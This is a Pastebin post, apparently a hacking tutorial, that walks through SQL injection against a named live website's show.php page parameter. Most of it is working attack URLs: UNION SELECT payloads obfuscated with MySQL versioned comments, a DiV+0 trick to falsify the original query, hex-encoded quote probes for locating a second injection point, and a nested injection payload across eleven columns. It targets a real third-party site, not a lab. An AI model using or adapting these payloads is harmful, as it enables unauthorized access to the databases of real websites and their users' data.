Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- explaination of my Chalnge
- Friends Let's See
- 1-injection point is :
- http://www.onlinepost.in/show.php?page=39
- -------------------------------------------------------
- 2-so, try to inject
- http://www.onlinepost.in/show.php?page= 39 /*!50000UnIoN*/ aLL SeLeCt+1,2,3,4--
- but the page remains same and no output comes so DiV+0 use to false the query
- -----------------------------------------------------------------------
- http://www.onlinepost.in/show.php?page= 39 +DiV+0+/*!50000UnIoN*/ aLL SeLeCt+1,2,3,4--
- but the also remains same no output comes
- ------------------------------------------------------------------------------------
- this code:
- http://www.onlinepost.in/show.php?page=39+DiV+0+/*!50000UnIoN*/ aLL SeLeCt+1,2,3,4-- -
- doesn't show vulnerable column,
- so first you try with union select 1111,2222,3333,4444-- - and search for those number in source code. If you can't find them that is why I check for another injection in one of possible four columns. you try with second injection with adding ' after each column with hex like
- /*!50000UnIoN*/ aLL SeLeCt+0x3127,2,3,4-- -
- You will find out 2' or 3' or 4' (in hex) doesn't give error, but 1' in hex 0x3127 gives you error. So there is possible second injection
- ---------------------------------------------------------------------------------------------------------
- then you try to find column numbers for second injection. As you see in my code there are 11 column for second injection. Complete second injection is done inside of column 1. So we have double injection - BUT this is not same as error based double injection. This is injection inside injection
- like
- http://www.onlinepost.in/show.php?page= 39 +DiV+0+/*!50000UnIoN*/ aLL SeLeCt+"1'+DiV+0+/*!50000UnIoN*/+aLL+SeLeCt+1,2,3,4,5,6,7,8,9,10,11-- -",2,3,4--
- and double quotes are use because magic_quotes are off so we don't need hex
- ---------------------------------------------------------------------------------------------
- so we successfully injected if any problem in my tut so plz tell me
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement